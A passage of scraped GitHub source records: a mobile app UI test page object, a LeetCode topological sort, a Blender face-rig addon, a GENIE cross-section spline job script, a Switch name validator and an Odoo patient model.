time.sleep(2)\n return self.dynamicDetailPageAssertion()\n \n #附近动态tap\n def nearby_dynamics_tap(self):\n self.wait_element_clickable(roomloc.tv_content,model=\"关注按钮是否可点击\")\n self.click_element(roomloc.tv_content,model=\"点击关注tap\")\n\n #附近动态列表-进入动态详情\n def nearby_dynamics_list(self):\n nearbyDynamicsList = self.is_element_exist(squareloc.tv_content,model=\"附近动态列表\")\n if nearbyDynamicsList == True:\n nearby_dynamicsList = self.get_elements(squareloc.tv_content,model=\"获取动态列表\") \n log.info(\"列表数据有{}条\".format(len(nearby_dynamicsList)))\n dt_num = random.randint(0,len(nearby_dynamicsList)-1) \n dynamics = random.choice(nearby_dynamicsList)\n log.info(\"点击第{}个动态查看详情\".format(dt_num))\n time.sleep(3)\n # nearby_dynamicsList[dt_num].click()\n dynamics.click()\n time.sleep(8)\n if self.is_element_exist(myloc.sendButton,model=\"发送按钮\"):\n self.assert_true(myloc.sendButton,model=\"发送按钮\")\n return \"1\"\n elif self.is_element_exist(squareloc.masterAvatarView,model=\"打赏礼物入口\"):\n self.assert_true(squareloc.masterAvatarView,model=\"断言打赏礼物入口\")\n self.roomPage.exit_chat_room()\n return \"2\"\n else:\n log.info(\"聊天室已关闭!!!\")\n self.save_webImgs(\"未进动态详情-聊天室也已关闭\")\n return \"3\"\n else:\n nearbyDynamicsList2 = self.is_element_exist(squareloc.nearby_dynamics_list2,model=\"附近动态列表2\") \n if nearbyDynamicsList2 == True:\n nearby_dynamicsList = self.get_elements(squareloc.nearby_dynamics_list2,model=\"获取动态列表2\") \n log.info(\"列表数据有{}条\".format(len(nearby_dynamicsList)))\n dt_num = random.randint(0,len(nearby_dynamicsList)-1) \n log.info(\"点击第{}个动态查看详情\".format(dt_num))\n nearby_dynamicsList[dt_num].click()\n time.sleep(5)\n if self.is_element_exist(squareloc.tvnick,model=\"昵称\"):\n self.assert_true(squareloc.tvnick,model=\"昵称\")\n return \"1\"\n elif self.is_element_exist(squareloc.masterAvatarView,model=\"礼物入口1\"):\n self.assert_true(squareloc.masterAvatarView,model=\"断言打赏礼物入口\")\n self.roomPage.exit_chat_room()\n return \"2\"\n else:\n log.info(\"未进入动态详情!!!\")\n self.save_webImgs(\"未进入动态详情\")\n return \"3\"\n else:\n log.info(\"动态列表暂无数据\")\n self.save_webImgs(\"动态列表暂无数据\")\n return \"4\"\n\n #点赞\n def spot_fabulous(self,repeat=9):\n bool = self.is_element_exist(squareloc.iv_prise,model=\"点赞元素\")\n if bool == False and repeat > 0:\n repeat = repeat - 1\n self.swipeUp()\n self.spot_fabulous(repeat)\n ivprise = self.is_clickable(squareloc.iv_prise,model=\"点赞元素\")\n log.info(ivprise)\n if ivprise :\n time.sleep(1)\n self.click_element(squareloc.iv_prise,model=\"点击点赞\")\n else:\n log.info(\"已点过赞了\")\n\n \n #关注\n def click_follow(self):\n if self.is_clickable(squareloc.follow,model=\"关注是否可点击\"):\n time.sleep(1)\n self.click_element(squareloc.follow,model=\"点击关注\")\n gz_toast = \"关注成功\"\n followSuccess = self.get_toast_msg(gz_toast, model=\"关注成功的toast\")\n self.assert_in(gz_toast, followSuccess, model=\"关注用户\") #断言关注\n else:\n log.info(\"已关注,不可再点击关注\")\n\n #举报\n def reportBtn(self):\n self.wait_element_clickable(squareloc.reportBtn,model=\"举报按钮是否可点击\")\n self.click_element(squareloc.reportBtn,model=\"点击举报按钮\")\n time.sleep(1)\n\n ''' 广场-关注-动态'''\n def square_attention(self):\n self.wait_click_element(squareloc.square_module,model=\"广场模块\")\n time.sleep(2)\n self.wait_click_element(squareloc.square_attention,model=\"关注\")\n return self.dynamicDetailPageAssertion()\n\n #动态详情页断言\n def dynamicDetailPageAssertion(self):\n dt_detail = self.nearby_dynamics_list() #动态列表随机-进入动态详情,并断言\n if dt_detail == \"1\":\n self.spot_fabulous() #点赞\n self.click_follow() #关注\n self.roomPage.click_more() #点击更多\n self.reportBtn() #举报\n self.assert_true(squareloc.commitBtn,model=\"举报断言\") #���报断言\n self.roomPage.go_back() #返回详情页\n self.roomPage.go_back_list() #返回列表页\n return True\n elif dt_detail == \"2\":\n # log.info(\"该用户正在聊天室嗨皮呢,所以未进入ta的主页,进入了ta所在的聊天室\")\n return True\n elif dt_detail == \"3\":\n return True\n elif dt_detail == \"4\":\n return True\n else:\n return False","repo_name":"lqrby/lk_test_app","sub_path":"Pages/pageObjects/square_page.py","file_name":"square_page.py","file_ext":"py","file_size_in_byte":6465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10816549981","text":"# 拓扑排序\nfrom Queue import Queue\nfrom collections import Counter\n\n\nclass Solution(object):\n def canFinish(self, numCourses, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: bool\n \"\"\"\n indegree, graph = Counter(), {}\n count = 0\n for i in range(numCourses):\n graph[i] = []\n for pre in prerequisites:\n indegree[pre[1]] += 1\n graph[pre[0]] += [pre[1]]\n q = Queue()\n for i in range(numCourses):\n if indegree[i] == 0:\n q.put(i)\n if q.empty():\n return False\n while not q.empty():\n cur = q.get()\n count += 1\n for item in graph[cur]:\n indegree[item] -= 1\n if indegree[item] == 0:\n q.put(item)\n if count == numCourses:\n return True\n else:\n return False\n","repo_name":"jia0713/leetcode","sub_path":"200-300/207-Course Schedule.py","file_name":"207-Course Schedule.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"42077532214","text":"# MB-Lab\n#\n# Сайт ветки MB-Lab: https://github.com/animate1978/MB-Lab\n# Сайт ветки перевода на русский язык MB-Lab: https://github.com/SergeyRom-23/MB-Lab-master-RU\n#\n# ##### НАЧАЛО ЛИЦЕНЗИОННОГО БЛОКА GPL #####\n#\n# Эта программа является свободным программным обеспечением; Вы можете распространять его и / или\n# изменить его в соответствии с условиями GNU General Public License\n# как опубликовано Фондом свободного программного обеспечения; либо версия 3\n# Лицензии или (по вашему выбору) любой более поздней версии.\n#\n# Эта программа распространяется в надежде, что она будет полезна,\n# но БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ; даже без подразумеваемой гарантии\n# ИЗДЕЛИЯ или ПРИГОДНОСТЬ ДЛЯ ОСОБЫХ ЦЕЛЕЙ. Смотрите\n# GNU General Public License для более подробной информации.\n#\n# Вам надо принять Стандартнуюй общественную лицензию GNU\n# вместе с этой программой; если нет, напишите в Фонд свободного программного обеспечения,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### КОНЕЦ ЛИЦЕНЗИОННОГО БЛОКА GPL #####\n#\n# ManuelbastioniLAB - Авторские права (C) 2015-2018 Manuel Bastioni\n# Перевод (C) 2019 Сергей Ром 23\n\n\nimport logging\nimport json\nimport os\nimport traceback\n\nimport bpy\n\nfrom . import algorithms\nfrom . import utils\n\nlogger = logging.getLogger(__name__)\n\n\ndef populate_modifier(mod, m):\n mod.active = m['active']\n mod.blend_in = m['blend_in']\n mod.blend_out = m['blend_out']\n mod.influence = m['influence']\n mod.mode = m['mode']\n mod.mute = m['mute']\n mod.poly_order = m['poly_order']\n # type should be created when the modifier is created\n #mod.type = m['type']\n mod.use_additive = m['use_additive']\n mod.use_influence = m['use_influence']\n mod.coefficients[0] = m['coefficients'][0]\n mod.coefficients[1] = m['coefficients'][1]\n\ndef populate_modifiers(modifiers, mlist):\n i = 0\n mod = modifiers[0]\n for m in mlist:\n if i == 0:\n populate_modifier(mod, m)\n i = i + 1\n else:\n mod = modifiers.new(m['type'])\n populate_modifier(mod, m)\n\ndef create_variable(var, driver, mb_name):\n fr_name = var['targets'][0]['id_name']+'.'+mb_name\n face_rig = bpy.data.objects[fr_name]\n\n v = driver.driver.variables.new()\n\n v.name = var['name']\n v.type = var['type']\n # we have one target by default\n v.targets[0].id = face_rig\n v.targets[0].transform_space = var['targets'][0]['transform_space']\n v.targets[0].transform_type = var['targets'][0]['transform_type']\n v.targets[0].bone_target = var['targets'][0]['bone_target']\n\ndef rm_drivers(mname):\n for d in bpy.data.objects[mname].data.shape_keys.key_blocks:\n rc = d.driver_remove('value')\n if not rc:\n logger.critical(\"failed to removed a driver: %d\", rc)\n\ndef add_drivers(drivers, mb_name):\n # Iterate through each driver entry and create driver\n mesh = algorithms.get_active_body()\n mname = mesh.name\n for k, v in drivers.items():\n shape_name = v['data_path'].strip('key_blocks[\"').strip('\"].value')\n idx = bpy.data.objects[mname].data.shape_keys.key_blocks.find(shape_name)\n if idx == -1:\n logger.critical(\"%s ключ формы не найден\", shape_name)\n continue\n check = bpy.data.objects[mname].data.shape_keys.animation_data and \\\n bpy.data.objects[mname].data.shape_keys.animation_data.drivers.\\\n find(v['data_path'])\n if check:\n logger.critical(\"%s у ключа формы уже есть данные анимации\", shape_name)\n continue\n\n # NOTE: The call to driver_add adds a modifier of type GENERATOR\n # automatically\n driver = bpy.data.objects[mname].data.shape_keys.key_blocks[idx]. \\\n driver_add('value')\n\n # Populate the driver\n driver.hide = v['hide']\n driver.lock = v['lock']\n driver.mute = v['mute']\n driver.select = v['select']\n populate_modifiers(driver.modifiers, v['modifiers'])\n driver.driver.expression = v['driver']['expression']\n driver.driver.is_valid = v['driver']['is_valid']\n driver.driver.type = v['driver']['type']\n driver.driver.use_self = v['driver']['use_self']\n variables = v['driver']['variables']\n for var in variables:\n create_variable(var, driver, mb_name)\n\ndef add_facs_drivers(skd, mesh):\n au_div = skd['Divisor']['au_value']\n gz_div = skd['Divisor']['gz_value']\n\n mname = mesh.name\n\n for au, exprs in skd.items():\n if au == 'Divisor':\n continue\n\n # get the object\n slider = \"facs_rig_slider_\"+au+\".\"+mname\n slider_obj = bpy.data.objects.get(slider)\n if not slider_obj:\n logger.critical(\"%s slider controller not found\", slider)\n continue\n\n # iterate over all the expressions which are part of this AU\n for skn, skv in exprs.items():\n # Look up the shape key\n idx = bpy.data.objects[mname].data.shape_keys.key_blocks.find(skn)\n if idx == -1:\n logger.critical(\"%s shape key not found\", skn)\n continue\n\n # Add a variable for the AU\n data_path = 'key_blocks[\"'+skn+'\"].value'\n no_animation = not bpy.data.objects[mname].data.shape_keys.animation_data\n\n if no_animation:\n logger.critical(\"FACS system depends on facial rig. Please add one\")\n return -1\n\n # get the driver\n driver = bpy.data.objects[mname].data.shape_keys.animation_data.drivers.find(data_path)\n if not driver:\n logger.critical(\"FACS system depends on facial rig. Please add one\")\n return -1\n\n # Add the variable for the Action Unit\n v = driver.driver.variables.new()\n\n v.name = au\n v.type = 'TRANSFORMS'\n # we have one target by default\n v.targets[0].id = slider_obj\n v.targets[0].transform_space = 'LOCAL_SPACE'\n v.targets[0].transform_type = 'LOC_X'\n\n # append to the existing expression\n # max_slider_value * constant = max_shape_key_value\n # constant = max_shape_key_value / max_slider_value\n # Formula for transforming slider value to shape key value is\n # shape_key_value = slider_value * constant\n # slider value is extracted from the variable we created\n if au == 'GZ0H' or au == 'GZ0V':\n constant = skv / gz_div\n if '_min' in skn:\n driver.driver.expression = driver.driver.expression + '+ ('+au+'*'+str(constant)+')'\n elif '_max' in skn:\n driver.driver.expression = driver.driver.expression + '+ (-'+au+'*'+str(constant)+')'\n else:\n constant = skv / au_div\n driver.driver.expression = driver.driver.expression + '+ ('+au+'*'+str(constant)+')'\n\n return 0\n\ndef append_rig(rig_name, data_path):\n face_rig_blend = os.path.join(data_path, \"face_rig\", \"face_rig_lib.blend\")\n\n if not os.path.exists(face_rig_blend):\n logger.critical(\"%s not found. Might need to reinstall ManuelBastioniLab\", face_rig_blend)\n return False\n\n file_path = face_rig_blend+\"\\\\\"+\"Collection\\\\\"+rig_name\n directory = face_rig_blend+\"\\\\\"+\"Collection\"\n try:\n bpy.ops.wm.append(filepath=file_path, filename=rig_name, directory=directory)\n except RuntimeError as e:\n logger.critical(\"%s\", str(e))\n return False\n\n return True\n\ndef find_collLayer(layerColl, collName):\n found = None\n if (layerColl.name == collName):\n return layerColl\n for layer in layerColl.children:\n found = find_collLayer(layer, collName)\n if found:\n return found\n\ndef rename_collection(collLayer, new):\n collLayer.collection.name = new\n\ndef rename_object_in_collection(c, orig, new):\n for obj in c.collection.all_objects:\n if obj.name == orig:\n obj.name = new\n\ndef get_root_bone(armat, root):\n armat.select_set(True)\n bpy.context.view_layer.objects.active = armat\n bpy.ops.object.mode_set(mode='POSE')\n for b in bpy.context.object.pose.bones:\n if b.name == root:\n return b\n return None\n\ndef get_root_bone_xyz_loc(obj):\n # move the Rigs closer to the character\n armat = utils.get_deforming_armature(obj)\n if not armat:\n logger.critical(\"No aramature found for character %s. Ignoring\",\n obj.name)\n return 0, False\n\n root_bone = get_root_bone(armat, 'root')\n if not root_bone:\n logger.critical(\"%s does not have a root bone. Ignoring\", obj.name)\n return 0, False\n\n root_x = root_bone.location[0]\n root_y = root_bone.location[1]\n root_z = root_bone.location[2]\n\n return root_x, root_y, root_z, True\n\ndef setup_face_rig(obj):\n face_rig_collName = 'Face_Rig.'+obj.name\n face_rig_name = 'MBLab_skeleton_face_rig.'+obj.name\n ph_rig_collName = 'Phoneme_Rig.'+obj.name\n ph_rig_name = 'MBLab_skeleton_phoneme_rig.'+obj.name\n\n layerColl = find_collLayer(bpy.context.view_layer.layer_collection,\n face_rig_collName)\n # check if the face rig is already imported\n if layerColl:\n logger.critical(\"персонаж уже имеет face rig\")\n return False\n\n data_path = algorithms.get_data_path()\n\n # Load the face rig\n if not data_path:\n logger.critical(\"%s не найдено. Пожалуйста, проверьте каталог аддонов Blender. Возможно, нужно переустановить ManuelBastioniLab\", data_path)\n return False\n\n if not append_rig('Face_Rig', data_path) or \\\n not append_rig('Phoneme_Rig', data_path):\n return False\n\n # rename imported items\n fr_coll = find_collLayer(bpy.context.view_layer.layer_collection, 'Face_Rig')\n if not fr_coll:\n logger.critical(\"Face Rig неверный, нужно вручную удалить\")\n return False\n rename_collection(fr_coll, face_rig_collName)\n rename_object_in_collection(fr_coll, 'MBLab_skeleton_face_rig', face_rig_name)\n\n pr_coll = find_collLayer(bpy.context.view_layer.layer_collection, 'Phoneme_Rig')\n if not pr_coll:\n logger.critical(\"Face Rig неверный, нужно вручную удалить\")\n return False\n rename_collection(pr_coll, ph_rig_collName)\n rename_object_in_collection(pr_coll, 'MBLab_skeleton_phoneme_rig', ph_rig_name)\n\n # load face rig json file\n json_file = os.path.join(data_path, \"face_rig\", \"expression_drivers.json\")\n\n if not os.path.exists(json_file):\n logger.critical(\"%s не найдено. Возможно, нужно переустановить ManuelBastioniLab\", json_file)\n return False\n\n with open(json_file, 'r') as f:\n drivers = json.load(f)\n add_drivers(drivers, obj.name)\n\n root_x, root_y, root_z, rc = get_root_bone_xyz_loc(obj)\n if not rc:\n return True\n\n # set the root of the face and phoneme rigs\n face_rig = algorithms.get_object_by_name(face_rig_name)\n if not face_rig:\n logger.critical(\"Can't find %s. Delete face rig manually\",\n face_rig_name)\n return False\n\n root_bone = get_root_bone(face_rig, 'root')\n if not root_bone:\n logger.critical(\"%s does not have a root bone. Ignoring\", obj.name)\n return True\n\n root_bone.location[0] = root_x + 0.5\n root_bone.location[1] = -root_z\n root_bone.location[2] = root_y\n\n ph_rig = algorithms.get_object_by_name(ph_rig_name)\n if not face_rig:\n logger.critical(\"Can't find %s. Delete face rig manually\",\n face_rig_name)\n return False\n\n root_bone = get_root_bone(ph_rig, 'root')\n if not root_bone:\n logger.critical(\"%s does not have a root bone. Ignoring\", obj.name)\n return True\n\n root_bone.location[0] = root_x + 0.5\n root_bone.location[1] = -root_z\n root_bone.location[2] = root_y\n\n return True\n\ndef rename_facs_objs(c, post):\n for obj in c.collection.all_objects:\n obj.name = obj.name+\".\"+post\n\ndef setup_facs_rig(obj):\n # check if the facs rig is already imported\n facs_rig_collName = 'Facs_Rig.'+obj.name\n layerColl = find_collLayer(bpy.context.view_layer.layer_collection,\n facs_rig_collName)\n # check if the face rig is already imported\n if layerColl:\n logger.critical(\"Character already has face rig\")\n return False\n\n data_path = algorithms.get_data_path()\n\n # Load the face rig\n if not data_path:\n logger.critical(\"%s not found. Please check your Blender addons directory. Might need to reinstall ManuelBastioniLab\", data_path)\n return False\n\n if not append_rig('Facs_Rig', data_path):\n return False\n\n # rename imported items\n facs_coll = find_collLayer(bpy.context.view_layer.layer_collection, 'Facs_Rig')\n if not facs_coll:\n logger.critical(\"FACS Rig broken. Manually delete\")\n return False\n rename_collection(facs_coll, facs_rig_collName)\n rename_facs_objs(facs_coll, obj.name)\n\n # load face rig json file\n json_file = os.path.join(data_path, \"face_rig\", \"facs_au.json\")\n\n if not os.path.exists(json_file):\n logger.critical(\"%s not found. Might need to reinstall ManuelBastioniLab\", json_file)\n return False\n\n with open(json_file, 'r') as f:\n shape_keys = json.load(f)\n try:\n add_facs_drivers(shape_keys, obj)\n except Exception as e:\n traceback.print_stack()\n logger.critical(\"%s\".str(e))\n return False\n\n root_x, root_y, root_z, rc = get_root_bone_xyz_loc(obj)\n if not rc:\n return True\n\n facs_frame = \\\n algorithms.get_object_by_name('facs_rig_frame.'+obj.name)\n if not facs_frame:\n logger.critical(\"FACS frame %s not found\",\n 'facs_rig_frame.'+obj.name)\n return True\n\n facs_frame.location[0] = root_x + 0.5\n facs_frame.location[1] = -root_y\n facs_frame.location[2] = -root_z + facs_frame.location[2]\n\n return True\n\ndef recursive_collection_delete(head):\n for c in head.children:\n recursive_collection_delete(c)\n\n head.hide_select = False\n head.hide_render = False\n head.hide_viewport = False\n\n for obj in head.all_objects:\n obj.select_set(True)\n bpy.ops.object.delete()\n\n bpy.data.collections.remove(head)\n\ndef delete_face_rig(obj):\n if not 'MBLab_skeleton_face_rig.' in obj.name and not 'MBLab_skeleton_phoneme_rig.' in obj.name:\n return False\n\n character_name = ''\n if 'MBLab_skeleton_face_rig.' in obj.name:\n character_name = obj.name.replace('MBLab_skeleton_face_rig.', '')\n elif 'MBLab_skeleton_phoneme_rig.' in obj.name:\n character_name = obj.name.replace('MBLab_skeleton_phoneme_rig.','')\n\n fr_name = 'MBLab_skeleton_face_rig.'+character_name\n pr_name = 'MBLab_skeleton_phoneme_rig.'+character_name\n\n # check if the face rig is already imported\n facerig = bpy.data.objects.get(fr_name)\n if not facerig:\n logger.critical(\"face rig не добавляется\")\n return False\n\n # check if the face rig is already imported\n phoneme = bpy.data.objects.get(pr_name)\n if not phoneme:\n logger.critical(\"фонема rig не добавляется\")\n return False\n\n rm_drivers(character_name)\n\n # store the original selection\n orig_selection = {}\n for ob in bpy.context.scene.objects:\n orig_selection[ob.name] = ob.select_get()\n ob.select_set(False)\n\n # delete all the rigs\n facerig.select_set(True)\n phoneme.select_set(True)\n bpy.ops.object.mode_set(mode=\"OBJECT\")\n bpy.ops.object.delete()\n\n # delete all the collections\n c = bpy.data.collections.get('Face_Rig.'+character_name)\n if c:\n recursive_collection_delete(c)\n c = bpy.data.collections.get('Facs_Rig.'+character_name)\n if c:\n recursive_collection_delete(c)\n c = bpy.data.collections.get('Phoneme_Rig.'+character_name)\n if c:\n recursive_collection_delete(c)\n\n # restore the original selection\n for ob in bpy.context.scene.objects:\n ob.select_set(orig_selection[ob.name])\n\n return True\n\n","repo_name":"SergeyRom-23/MB-Lab-master-RU","sub_path":"facerig.py","file_name":"facerig.py","file_ext":"py","file_size_in_byte":17082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36483685320","text":"import os, glob, re\nimport FNALGridUtils as FNAL\n\n# Define Dictionaries\nnucleons_pdg = {\n 'n' : 1000000010,\n 'p' : 1000010010 }\nnucleons_name = {\n 1000000010 : 'n',\n 1000010010 : 'p' } \ntgt_pdg = [1000010020, 1000010030, 1000020030, 1000020040, 1000060120, 1000080160, 1000130270, 1000200400, 1000200480, 1000260560, 1000791970, 1000822080, 1000922380 ]\n\nnucleons_EW_proc = [ 'none', 'CCRES', 'NCRES', 'CCDIS', 'NCDIS', 'CCDFR', 'NCDFR', 'Fast' ]\nnucleons_EM_proc = [ 'none', 'EMRES', 'EMDIS', 'EMQEL' ]\nnuclei_EW_proc = [ 'none', 'WeakMEC', 'CCCOHPION', 'NCCOHPION', 'Fast' ]\nnuclei_EM_proc = [ 'none', 'EMMEC', 'EMQE', 'EMRES', 'EMDIS' ]\n\nnu_pdg_def = { 've' : 12,\n 'vebar' : -12,\n 'vmu' : 14,\n 'vmubar' : -14,\n 'vtau' : 16,\n 'vtaubar' : -16 }\nnu_name_def = { 12 : 've' ,\n -12 : 'vebar' ,\n 14 : 'vmu' ,\n -14 : 'vmubar' ,\n 16 : 'vtau' ,\n -16 : 'vtaubar' }\ne_pdg_def = { 'e' : 11, \n 'ebar' : -11 }\ne_name_def = { 11 : 'e', \n -11: 'ebar' }\n\n\ndef GroupSplineCommands( group_vN=False, xml_dir=os.getenv('PWD'), mother_dir='', tune='G18_02_02_11b', gen_list='all',version='master', conf_dir='', grid_system='FNAL', group='genie', \n arch='SL6.x86_64', production='routine_validation', cycle='01', softw_topdir=os.getenv('GENIE_MASTER_DIR'),\n genie_topdir=os.getenv('GENIE'), grid_setup = os.getenv('GENIE')+'src/scripts/production/python/setup_FNAL.sh',\n genie_setup = os.getenv('GENIE')+'src/scripts/production/python/setup_GENIE.sh', jobs_topdir=os.getenv('PWD'), add_list=False, add_nucleons = False, \n time=2, memory=\"2GB\",disk=\"2GB\", git_branch=\"master\", git_loc=\"https://github.com/GENIE-MC/Generator\", configure_INCL=False, configure_G4=False ) :\n \n # Store root output only for vA spilnes:\n root_output = False \n if group_vN == False: \n root_output = True\n\n if not os.path.exists(xml_dir) :\n print ( xml_dir+\" doesn't exist\")\n return \n\n store_total_xsec = False\n if gen_list == 'none' :\n store_total_xsec = True \n\n\n if group_vN == True : \n process_name = \"group_vN\"\n job_ID = 1 \n else : \n process_name = \"group_vA\"\n job_ID = 3 \n\n if mother_dir != '' : \n if os.path.exists(mother_dir) :\n xml_files_motherdir = glob.glob(mother_dir+\"/*.xml\")\n else :\n print ( mother_dir+\" doesn't exist\")\n return \n\n #Given a mother directory and a daughter directory, the script tryies\n # to copy (ln -s) all the files in the mother dir into the daughter\n # If the file alredy exists, the link is not created.\n for xml_file in xml_files_motherdir : \n # Check if exist in xml_dir \n xml_file_name = os.path.basename(xml_file)\n if os.path.exists(xml_dir+\"/\"+xml_file_name[:-4]+\".sh\") : continue \n \n if xml_file_name[:-4] == 'total_xsec' : \n if store_total_xsec == True : \n os.link(xml_file,xml_dir+\"/\"+xml_file_name) # link xml files\n continue \n os.link(xml_file,xml_dir+\"/\"+xml_file_name) # link xml files\n os.link(xml_file[:-4]+\".sh\",xml_dir+\"/\"+xml_file_name[:-4]+\".sh\") # link sh files\n if store_total_xsec == True : \n temp_command_dict = {}\n temp_command_dict[job_ID] = []\n return temp_command_dict \n\n # Get names of sh files: these determine the name of the future xml files\n xml_files_dir = glob.glob(xml_dir+\"/*.sh\")\n \n # Store nu, tgt and process that have a corresponding xml file\n dir_nu_list = []\n dir_e_list = []\n dir_nu_tgt_list = []\n dir_e_tgt_list = []\n dir_EW_process_list = []\n dir_EM_process_list = []\n ## sore for later\n lepton_list = []\n tgt_list = []\n in_xml_files = []\n for xml_file in xml_files_dir : \n xml_file = os.path.basename(xml_file)[:-3]\n in_xml_files.append(xml_dir+xml_file+\".xml\")\n xml_content = xml_file.split(\"_\")\n if len(xml_content) < 4 : continue\n\n if xml_content[0] in nu_pdg_def : \n if xml_content[0] not in dir_nu_list : \n dir_nu_list.append(xml_content[0])\n if xml_content[2] not in dir_nu_tgt_list: \n dir_nu_tgt_list.append(xml_content[2])\n if xml_content[3] not in dir_EW_process_list:\n dir_EW_process_list.append(xml_content[3])\n elif xml_content[0] in e_pdg_def : \n if xml_content[0] not in dir_e_list : \n dir_e_list.append(xml_content[0])\n if xml_content[2] not in dir_e_tgt_list : \n dir_e_tgt_list.append(xml_content[2])\n if xml_content[3] not in dir_EM_process_list:\n dir_EM_process_list.append(xml_content[3])\n\n ## For root output \n if root_output : \n if xml_content[0] not in lepton_list : \n lepton_list.append(xml_content[0]) \n if xml_content[2] not in tgt_list : \n tgt_list.append(xml_content[2]) \n\n dict_target = {}\n for target in dir_nu_tgt_list : \n dict_nu = {}\n for nu in dir_nu_list : \n dict_nu[nu] = []\n for process in dir_EW_process_list : \n if process == 'CCDFR' or process == 'NCDFR' :\n if target == 'n' or target == '1000000010': continue\n dict_nu[nu].append(nu+\"_on_\"+target+\"_\"+process+\".xml\")\n # Add all files to merge here:\n dict_target[target] = dict_nu \n \n for target in dir_e_tgt_list : \n dict_e={}\n if target in dict_target : \n dict_e = dict_target[target]\n for e in dir_e_list : \n dict_e[e] = []\n for process in dir_EM_process_list : \n dict_e[e].append(e+\"_on_\"+target+\"_\"+process+\".xml\")\n\n # Add all files to merge here:\n dict_target[target] = dict_e \n\n if grid_system == 'FNAL' : \n path = \"$CONDOR_DIR_INPUT/\"\n else : \n path = xml_dir\n\n commands = []\n com_total = \"gspladd -o \"+path+\"total_xsec.xml -f \" \n for tgt in dict_target : \n com_nu = \"gspladd -o \"+path+tgt+\".xml -f \"\n for nu in dict_target[tgt]:\n com_proc = \"gspladd -o \"+path+nu+\"_on_\"+tgt+\".xml -f \"\n for file_proc in dict_target[tgt][nu] : \n com_proc += path+file_proc + \",\"\n com_proc = com_proc[:-1]\n commands.append(com_proc) \n com_nu += path+nu+\"_on_\"+tgt+\".xml,\"\n com_nu = com_nu[:-1]\n #if len(dict_target[tgt]) == 1 : \n # commands.append(\"ifdh cp \"+path+nu+\"_on_\"+tgt+\".xml \"+path+tgt+\".xml\")\n #else :\n # commands.append(com_nu) \n com_total += nu+\"_on_\"+tgt+\".xml,\"\n com_total = com_total[:-1]\n\n ## if only one target simply rename\n if len(dict_target) == 1 : \n commands.append(\"ifdh cp \"+path+tgt+\".xml \"+path+\"total_xsec.xml\")\n else :\n commands.append(com_total) \n\n out_files = [ \"total_xsec.xml\" ] \n if os.path.exists( xml_dir + '/total_xsec.xml' ) :\n if store_total_xsec == False :\n # Need to remove xml files before re-generating them \n os.remove( xml_dir + '/total_xsec.xml' )\n \n if root_output :\n # Check if file exists - and remove\n if os.path.exists( xml_dir + '/total_xsec.root' ) :\n # Need to remove xml files before re-generating them \n os.remove( xml_dir + '/total_xsec.root' )\n\n str_probe_list = ''\n str_tgt_list = ''\n for tgt in tgt_list:\n str_tgt_list += tgt+\",\"\n for lepton in lepton_list : \n if lepton in nu_pdg_def : \n str_probe_list += str(nu_pdg_def[lepton])+\",\"\n elif lepton in e_pdg_def : \n str_probe_list += str(e_pdg_def[lepton])+\",\"\n str_probe_list = str_probe_list[:-1]\n str_tgt_list = str_tgt_list[:-1]\n\n ## Create an output file with all the splines in root format\n commands.append( \"gspl2root -p \"+str_probe_list+\" -t \"+str_tgt_list+\" -f \"+path+\"total_xsec.xml -o \"+path+\"total_xsec.root --tune \"+tune )\n out_files.append(\"total_xsec.root\")\n\n # Call Commands\n shell_file = ''\n command_list = []\n if grid_system == 'FNAL' :\n shell_file=FNAL.CreateShellScript ( commands , xml_dir, process_name, out_files, grid_setup, genie_setup, conf_dir, in_xml_files, git_branch, git_loc, configure_INCL,configure_G4 ) \n grid_command_options = FNAL.FNALShellCommands(grid_setup, genie_setup, time, memory, disk )\n command_list.append( \"jobsub_submit \"+grid_command_options+ \" file://\"+shell_file )\n\n ## Add command list to dictionary; \n command_dict = {}\n command_dict[job_ID] = command_list \n return command_dict \n","repo_name":"GENIE-MC/Generator","sub_path":"src/scripts/production/python/xsec_splines/GroupSplineCommands.py","file_name":"GroupSplineCommands.py","file_ext":"py","file_size_in_byte":9350,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"35"} +{"seq_id":"13448690735","text":"import english_uk\nimport symbols\nfrom exit_code import ExitCode\n\nALL_CHARACTERS = set(english_uk.ENGLISH_UK_REMOVED_DUPES + symbols.SYMBOLS_REMOVED_DUPES)\nALL_CHARACTERS_VALID_FOR_NAME = set(english_uk.ENGLISH_UK_VALID_FOR_NAME_ONLY + symbols.SYMBOLS_VALID_FOR_NAME_ONLY)\n\n\ndef verify(input_str: str, verbose: bool = True) -> ExitCode:\n if not input_str:\n if verbose:\n print('Invalid: Name must be at least one character.')\n return ExitCode.INVALID_LENGTH\n\n exit_code = ExitCode.SUCCESS\n if len(input_str) > 10:\n if verbose:\n print('Invalid: Name cannot be more than 10 characters.')\n exit_code |= ExitCode.INVALID_LENGTH\n\n if all(char in ALL_CHARACTERS_VALID_FOR_NAME for char in input_str):\n if verbose:\n print('Characters valid!')\n else:\n if verbose:\n print('Invalid: The following characters were not found/allowed: ')\n print(''.join([char for char in input_str if char not in ALL_CHARACTERS_VALID_FOR_NAME]))\n\n exit_code |= ExitCode.INVALID_CHARS\n\n return exit_code\n","repo_name":"kjhf/NintendoSwitchKeyboard","sub_path":"keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40021385022","text":"from odoo import api, fields, models\n\nclass res_partner(models.Model):\n _inherit = \"res.partner\"\n\n patient = fields.Char(string='Patient', default='/')\n name = fields.Char(string='Name')\n job = fields.Char(string='Job')\n gender = fields.Selection([\n ('male','Male'),\n ('female','Female')\n ], string='Gender')\n birth_date = fields.Date('Birth Date')\n blood_type = fields.Selection([\n ('a','A'),\n ('b','B'),\n ('ab','AB'),\n ('o','O'),\n ], string='Blood Type')\n status = fields.Selection([\n ('single','Single'),\n ('married','Married'),\n ('divorce','Divorce'),\n ], string='Status')\n patient_history = fields.One2many('clinic.checkup', 'patient_id', 'Patient History')\n\n 